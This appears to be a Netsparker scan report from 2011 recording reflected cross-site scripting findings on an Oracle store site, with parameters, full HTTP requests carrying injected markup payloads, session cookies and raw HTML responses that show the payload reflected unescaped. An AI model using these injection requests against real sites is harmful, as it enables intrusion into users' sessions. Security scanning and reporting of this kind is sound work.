<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><a href=ibeCZzdMinisites.jsp?language=KO&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangKO.gif" width=43 height=19 alt="한국어" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=D&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangD.gif" width=45 height=19 alt="Deutsch" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=E&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangE.gif" width=45 height=19 alt="Español" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <img src="/OA_MEDIA/ibeLangUSS.gif" width=39 height=19 alt="English" border=0 ><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=F&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangF.gif" width=45 height=19 alt="Français" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=JA&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangJA.gif" width=42 height=19 alt="日本語" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=ZHT&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangZHT.gif" width=56 height=19 alt="繁體中文" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=ZHS&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangZHS.gif" width=56 height=19 alt="简体中文" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=PTB&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangPTB.gif" width=99 height=19 alt="Português do Brasil" border=0 ></a><img src="/OA_MEDIA/ibeLangDot.gif" width=9 height=19 ALT="Language Sparator Image" > <a href=ibeCZzdMinisites.jsp?language=ESA&ref='" ns= netsparker(0x0005AD) ><img src="/OA_MEDIA/ibeLangESA.gif" width=135 height=19 alt="Español Latinoamericano" border=0 ></a><br><br><!--out table for the part between top and bottom--><table summary='' border="0" width="100%" cellspacing="0" cellpadding="0"> <!-- left column ---------------------------------------------------------> <tr> <td valign="top" width="15%" nowrap> </td> <!--spacer between left and middle column--> <td><img src="/OA_MEDIA/jtfutrpx.gif" width="10" alt=""></td> <!-- center column -------------------------------------------------------> <td valign="top" width="70%" class="prompt"> <!-- middle bin 1 & 2--> <!--end of middle bin1&2--> <!--table for group picker--> <table border="0" cellspacing="0" cellpadding="0" width="100%" align="center" summary=""> <tr> <td colspan=10 > <table border="0" cellspacing="0" cellpadding="0" width="100%" summary=""> <tr> <td class="pageTitle" width="100%"> Choose Your Site </td> </tr> </table> </td> <!--end of table for group picker--> </tr><!-- <tr> <td colspan=10 class=OraBGAccentDark><img src="/OA_MEDIA/jtfutrpx.gif" height=1 width=1 alt=""></td> </tr>--> <!--<TR><TD colspan=10 >&nbsp;</TD></TR>--><tr><td colspan=10 class="sectionHeader1">Store</td></tr> <!--<tr><td colspan=10 class=OraBGAccentDark><img src="/OA_MEDIA/jtfutrpx.gif" height=1 width=1 alt=""></td></tr>--><TR><TD colspan=10 >&nbsp;</TD></TR> <tr> <td width="8%">&nbsp;</td> <td valign=top><img src="jtfdload.jsp?fileid=421394366&appName=IBE" ALT="Specialty Store Logo Image" align=top ></td> <td valign=top><span class=sectionHeaderBlack>Australia</span><br><span class=prompt><a href='" ns= netsparker(0x0005AD) ?minisite=10062&respid=1298367&grp=STORE&language=US><span class='OraHiddenText'>Australia-</span>English</a></span></td> <td>&nbsp;&nbsp;&nbsp;</td> <td valign=top><img src="jtfdload.jsp?fileid=421886109&appName=IBE" ALT="Specialty Store Logo Image" align=top ></td> <td valign=top><span class=sectionHeaderBlack>Belgium</span><br><span class=prompt><a href='" ns= netsparker(0x0005AD) ?minisite=10365&respid=1298668&grp=STORE&language=US><span class='OraHiddenText'>Belgium-</span>English</a></span></td> <td>&nbsp;&nbsp;&nbsp;</td> <td valign=top><img src="jtfdload.jsp?fileid=421404448&appName=IBE" ALT="Specialty Store Logo Image" align=top ></td> <td valign=top><span class=sectionHeaderBlack>Canada</span><br><span class=prompt><a href='" ns= netsparker(0x0005AD) ?minisite=10084&respid=1298440&grp=STORE&language=US><span class='OraHiddenText'>Canada-</span>English</a>&nbsp;&nbsp;<a href='" ns= netsparker(0x0005AD) ?minisite=10084&respid=1298440&grp=STORE&language=F><span class='OraHiddenText'>Canada-</span>French</a></span></td> <td width="5%">&nbsp;</td> </tr> <tr><td colspan=3>&nbsp;</td></tr> <tr> <td width="8%">&nbsp;</td> <td valign=top&..
- /OA_HTML/ibeCZzdHelp.jsp

/OA_HTML/ibeCZzdHelp.jsp

https://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG585..

Parameters

Parameter Type Value
GSI GET xw7XzrhVDfQxPPTRIpSLNd3Y2y
GSI_pses GET ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
cg GET -200
kw GET "><net sparker=alert(0x000D5C)>

Request

GET /OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5&cg=-200&kw=%22%3E%3Cnet%20sparker=netsparker(0x000D5C)%3E HTTP/1.1
Referer: https://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?GSI=xw7XzrhVDfQxPPTRIpSLNd3Y2y&GSI_pses=ZG58546D7CC88023DFCAD78C33D94F83ED7A0D70952D644BCC5157A841AAB5468E856736C9A89661BEAE2F1B15C4D323B5
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=f2cedfb23c35dcb03d8be47db6148e3294a6d007567dbca941f004d7a143d93b.e34QbhaLa3mKbi0La3mQaNePax4Oe0; GSI_pses=ZGBE0D0EB820A9FEA498C2B3302EC2398346F6A5F19DB2B2545F9795DE2FB6E7B36AD39798E6DB239604B1EBAB5084391D; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=9VLueJID5TYmH1RzJSPnSPqpOR
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=f2cedfb23c35dcb03d8be47db6148e3294a6d007567dbca941f004d7a143d93b.e34QbhaLa3mKbi0La3mQaNePax4Oe0; path=/OA_HTML; secure,GSI_pses=ZGE5638C9B6F8A352AEBAE8563B6884387E620FF43AF932ECC8E2FB06721D71871DEEA38C3BE27F18AE5A102109ED50308; expires=Thu, 10-Nov-2011 17:59:47 GMT; path=/OA_HTML
Content-Length: 7612
Date: Sun, 11 Sep 2011 17:59:46 GMT
































<!-- $Header: ibeCZzdHelp.jsp 120.2 2007/12/05 08:10:50 scnagara ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --> <!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Help </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298440:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10062:1298440:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;null </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Orders</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpProfMenuHome.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Profile</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOLogin.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Login</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCAcpSSOReg.jsp?sitex=10062:1298440:US" class=OraGlobalButtonText> Register</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdHelp.jsp?sitex=10062:1298440:US" class=OraGlobalButtonTextSelected> Help</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> </tr> </table> </td> </tr> <tr> <td height="1" colspan="2" valign="bottom" align="left"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabL.gif" alt="" border="0"/></td> <td nowrap class="OraTabBarEnabled"> <a class="OraTabBarEnabled" target=_parent href="http://oraclestore.oracle.com/OA_HTML/ibeCCtpSctDspRte.jsp?section=10380&sitex=10062:1298440:US">Home</a> </td> <td width="1"><img src="/OA_HTML/cabo/images/swan/topDimTabR.gif" alt="" border="0"/></td> <td width="1"/> </tr> </table> </td> </tr> <tr> <td align="left" background="/OA_HTML/cabo/images/swan/header-Bg.gif" colspan="2"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8" height="5" /></td> </tr> </table> </td> </tr> </table> </td> </tr></table><form method="get" target=_parent name=searchItemaction="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp"><INPUT TYPE=hidden NAME="cg" value=""><INPUT TYPE=hidden NAME="kw" value=""><INPUT TYPE=hidden NAME="ds" value="0"><INPUT TYPE=hidden NAME="dr" value="50"><INPUT TYPE=hidden NAME="st" value="kw"><INPUT TYPE=hidden NAME="cpg" value="0"> <!-- PREFAB_REF=""--></form><script language="JavaScript"><!--function postSearchItem() { var serIt = document.searchItem; var selIndex = document.common.cg.selectedIndex; serIt.cg.value = document.common.cg.options[selIndex].value; serIt.kw.value = document.common.kw.value; serIt.submit();}//--></script><form name=common onSubmit="postSearchItem();return false;"><table summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody> <tr class="searchBar"> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> <td align="left" valign="middle" nowrap height="25"> <table summary="" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="middle" nowrap class=prompt> Quick Search </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="cg"><span class="jttinvis"> Quick Search&nbsp;&nbsp;</span></label> <select id="cg" name="cg" class="prompt"> <option value=-200 >All Products <option value=10380>Home </select> </td> <td class="prompt" align="right" nowrap> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td valign="middle" nowrap> <label for="query"><span class="jttinvis"> Keyword(s):</span></label> <INPUT id="query" TYPE="text" size="30" NAME="kw" value=""><net sparker=netsparker(0x000D5C)>"> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td> <script language="JavaScript"> buttonGen("Go","javascript:postSearchItem()"); </script> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="4"/> </td> <td nowrap> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchAdvForm.jsp?sitex=10062:1298440:US" target=_parent class="searchBarLink"> Advanced Search</a>&nbsp;<a class=searchBarLink target=_parent href="/OA_HTML/ibeCCtpSctDspRte.jsp?section=11365&media=os_g_english_help_search_tool">Help</a> </a> </td> </tr> </table> </td> <td> <img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="8"/> </td> </tr></table></form><a id="TheContent" name="TheContent"></a><table class="contentBG" summary="" border=0 cellpadding=0 cellspacing=0 width=100%><tbody><!-- 11/11/2008 amaheshw Bug 7502501 --><tr><td colspan=3><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></td></tr><tr><td><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=10></td><td width=100%><NOSCRIPT><table summary="" border=0 cellspacing=0 cellpadding=0> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=5><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=13></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR> <TR> <TD>&nbsp;</TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=OraBGAccentDark> <img alt='' height=32 src="/OA_MEDIA/jtfuwarn.gif" width=32></TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD class=errorHeader>Error</TD> <TD class=errorMessage><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=20></TD> <TD class=errorMessage width="100%"> <LI>JavaScript is disabled on your browser. JavaScript needs to be turned on for the application to be fully functional. </TD> <TD class=OraBGAccentDark>&nbsp;</TD> <TD>&nbsp;</TD> </TR> <TR> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD class=OraBGAccentDark colSpan=7><img alt='' height=10 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> <TD><img alt='' height=1 src="/OA_MEDIA/jtfutrpx.gif" width=1></TD> </TR></table></NOSCRIPT>










<!-- $Header: ibeCAcdProfMenuTop.jsp 120.0 2005/05/30 03:20:10 appldev noship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><!-- ibeCCtdMenu.jsp end --><!-- ibeCZzdMenu.jsp end --><CENTER><span class="pageTitle">Help Desk</span><br></CENTER>










<!-- $Header: misibeCustomHelp.jsp 120.0 2007/05/24 07:44:01 artripat noship $ -->
















<!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --> <!-- Begin os_au_help_index.html -->

<link rel=stylesheet href=jtfucss.c..
- /OA_HTML/ibeCSrdSrchResults.jsp

/OA_HTML/ibeCSrdSrchResults.jsp

http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp?cg=-200&kw=%22%3E%3Cnet%20sparker=alert..

Parameters

Parameter Type Value
cg GET -200
kw GET "><net sparker=alert(0x001018)>

Request

GET /OA_HTML/ibeCSrdSrchResults.jsp?cg=-200&kw=%22%3E%3Cnet%20sparker=netsparker(0x001018)%3E HTTP/1.1
Referer: http://oraclestore.oracle.com/OA_HTML/ibeCSrdSrchResults.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: oraclestore.oracle.com
Cookie: JSESSIONID=43a9f0f2c548cd1b9faf2b73c59ee692606f373547ae59ab7b36b0a67e0e8039.e34QbhaLa3mKbi0La3mQaNePax4Le0; GSI_pses=ZG7D937E1FD65B09237F06973464CABE1A486C716DA9EFCAFF921AD9FB1B3E5B953C78E6D6F5C1CAB07B2EEBC256C522F8; BIGipServergsiap_store_http=3540882061.5150.0000; GSI=j8Rnjln8bRrxqwuVKOYUAaal5p
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Encoding:
Set-Cookie: JSESSIONID=43a9f0f2c548cd1b9faf2b73c59ee692606f373547ae59ab7b36b0a67e0e8039.e34Qb38Qax0Obi0La3mQaxaObxuNe0; path=/OA_HTML; secure
Content-Length: 5200
Date: Sun, 11 Sep 2011 18:02:09 GMT
































<!-- $Header: ibeCSrdSrchResults.jsp 120.16.12010000.3 2009/03/30 05:20:55 scnagara ship $ --><!-- $Header: ibeCZzpHeader.jsp 120.32.12010000.3 2009/03/03 06:43:46 ukalaiah ship $ --><!-- ibeCZzpHeader.jsp end --><!--fixed bug 3854430 -- browser title derived from fnd_message instead of hardcoding --><!-- $Header: ibeCZzdTop.jsp 120.2 2005/07/04 04:26:38 appldev ship $ --> <!-- $Header: ibwTrackingHeader.jsp 120.6 2006/01/22 21:55 schittar noship $ -->















<!-- $Header: ibeCCtdTop.jsp 120.7.12010000.6 2010/04/23 07:18:39 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><HTML lang="EN-US"><HEAD> <TITLE> Site:Search Results </TITLE> <link rel=stylesheet href=ibeCStyleSheet.css> <SCRIPT LANGUAGE="JavaScript" SRC="ibeCButton.js"></script> <script LANGUAGE="javascript"> var disableanchorlink= true; var hidedivmouseout= [true, 200]; var formNameSL="null"; var relatedIndex="null"; function getWinOffset(what, offsettype){ return (what.offsetParent)? what[offsettype]+this.getWinOffset(what.offsetParent, offsettype) : what[offsettype]; } function isPopUpExist(m, e){ var e=window.event || e var c=e.relatedTarget || ((e.type=="mouseover")? e.fromElement : e.toElement) while (c && c!=m)try {c=c.parentNode} catch(e){c=m} if (c==m) return true; else return false; } function showSLPopup(anchorobj, subobj, e){ try{ if(isItemPopupOpen()){ closeItemPopup(); } }catch(ex){} formNameSL = anchorobj.getAttribute("formname"); try{ relatedIndex = anchorobj.getAttribute("relindex"); }catch(ex){} try{ document.getElementById('text_cr_shoplist').value='Create Shopping List'; }catch(ex){} try{ document.getElementById('text_cr_shoplist_details').value='Create Shopping List'; }catch(ex){} if (!this.isPopUpExist(anchorobj, e) || (e && e.type=="click")){ var e=window.event || e; if (e.type=="click" && subobj.style.visibility=="visible"){ subobj.style.visibility="hidden"; return; } var subobjtemp; if(formNameSL == 'relatedForm'){ subobjtemp=document.getElementById('tempoffset_related'); } else { subobjtemp=document.getElementById('tempoffset'); } var horizontaloffset=(subobj.dropposition[0]=="left")? -(subobj.offsetWidth-anchorobj.offsetWidth) : 0; var verticaloffset=(subobj.dropposition[1]=="top")? -subobj.offsetHeight : anchorobj.offsetHeight ; subobj.style.left=this.getWinOffset(subobjtemp, "offsetLeft") + horizontaloffset + "px"; subobj.style.top=this.getWinOffset(anchorobj, "offsetTop")+verticaloffset+"px"; subobj.style.clip=(subobj.dropposition[1]=="top")? "rect(auto auto auto 0)" : "rect(0 auto 0 0)"; subobj.style.visibility="visible"; subobj.startTime=new Date().getTime(); subobj.contentheight=parseInt(subobj.offsetHeight); if (typeof window["hidetimer_"+subobj.id]!="undefined") clearTimeout(window["hidetimer_"+subobj.id]); this.slideengine(subobj, (subobj.dropposition[1]=="top")? "up" : "down"); } } function curveincrement(percent){ return (1-Math.cos(percent*Math.PI)) / 2 ; } function slideengine(obj, direction){ var elapsed=new Date().getTime()-obj.startTime; if (elapsed<obj.glidetime){ var distancepercent=(direction=="down")? this.curveincrement(elapsed/obj.glidetime) : 1-this.curveincrement(elapsed/obj.glidetime); var currentclip=(distancepercent*obj.contentheight)+"px"; obj.style.clip=(direction=="down")? "rect(0 auto "+currentclip+" 0)" : "rect("+currentclip+" auto auto 0)"; window["glidetimer_"+obj.id]=setTimeout(function(){slideengine(obj, direction)}, 10); } else{ obj.style.clip="rect(0 auto auto 0)"; } } function hide(activeobj, subobj, e){ if (!isPopUpExist(activeobj, e)){ window["hidetimer_"+subobj.id]=setTimeout(function(){ subobj.style.visibility="hidden" subobj.style.left=subobj.style.top=0 clearTimeout(window["glidetimer_"+subobj.id]) }, hidedivmouseout[1]) } } function initpopup(anchorid, pos, glidetime, revealbehavior){ var anchorobj=document.getElementById(anchorid); var subobj=document.getElementById(anchorobj.getAttribute('rel')); subobj.dropposition=pos.split("-"); subobj.glidetime=glidetime || 1000; subobj.style.left=subobj.style.top=0; if (typeof revealbehavior=='undefined' || revealbehavior=='mouseover'){ anchorobj.onmouseover=function(e){showSLPopup(this, subobj, e)} anchorobj.onmouseout=function(e){hide(subobj, subobj, e)} if (this.disableanchorlink) anchorobj.onclick=function(){return false} } else anchorobj.onclick=function(e){showSLPopup(this, subobj, e); return false} if (this.hidedivmouseout[0]==true) subobj.onmouseout=function(e){hide(this, subobj, e)} }</script> </HEAD><body class="applicationBody"><!-- ibeCCtdTop.jsp end --><!-- ibeCZzdTop.jsp end --><!-- $Header: ibeCZzdMenu.jsp 120.4 2005/09/16 11:44:37 appldev ship $ -->



























<!-- $Header: ibeCCtdMenu.jsp 120.32.12010000.7 2009/06/02 09:02:13 ukalaiah ship $ --><!-- $Header: ibeCZzpRuntimeIncl.jsp 120.4 2008/01/14 07:12:08 skotikal ship $ --> <!-- ibeCZzpRuntimeIncl.jsp end --><a href="#TheContent"><img src="/OA_MEDIA/jtfutrpx.gif" align=right width=1 height=1 alt="Skip navigation elements to page contents" border="0"></a><table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td class="topBG"> <table width="100%" cellpadding="0" cellspacing="0" border="0"> <tr> <td colspan="2" height="10"><img src="/OA_MEDIA/jtfutrpx.gif" alt="" height="10"></td> </tr> <tr><!--- Commented the hardrcoded logo image bug 6794502 <td width="5%" valign="center"> <img src="/OA_MEDIA/FNDSSCORP.gif" alt="" border="0"/> </td>---><td width='5%' valign='center' ><a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US"><img src="jtfdload.jsp?fileid=455388252&appName=IBE&sitex=10062:1298367:US" ALT="Site Main Logo" border=0 ></a></td> <td width="95%" valign="bottom" class="applicationName"> &nbsp;&nbsp;Australia </td> </tr> <tr> <td colspan="2" align="right"> <table cellpadding="0" cellspacing="0" border="0"> <tr> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/ibeCZzdMinisites.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Sites</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="http://oraclestore.oracle.com/OA_HTML/misibeCScdViewA_LJE.jsp?sitex=10062:1298367:US" class=OraGlobalButtonText> Cart</a> </td> <td><img src="/OA_MEDIA/jtfutrpx.gif" alt="" width="5"></td> <td nowrap valign="top"> <a href="https://oraclestore.oracle.com/OA_HTML/ibeCOtdOrdSumMain.jsp?sitex=10062:1298367:US" 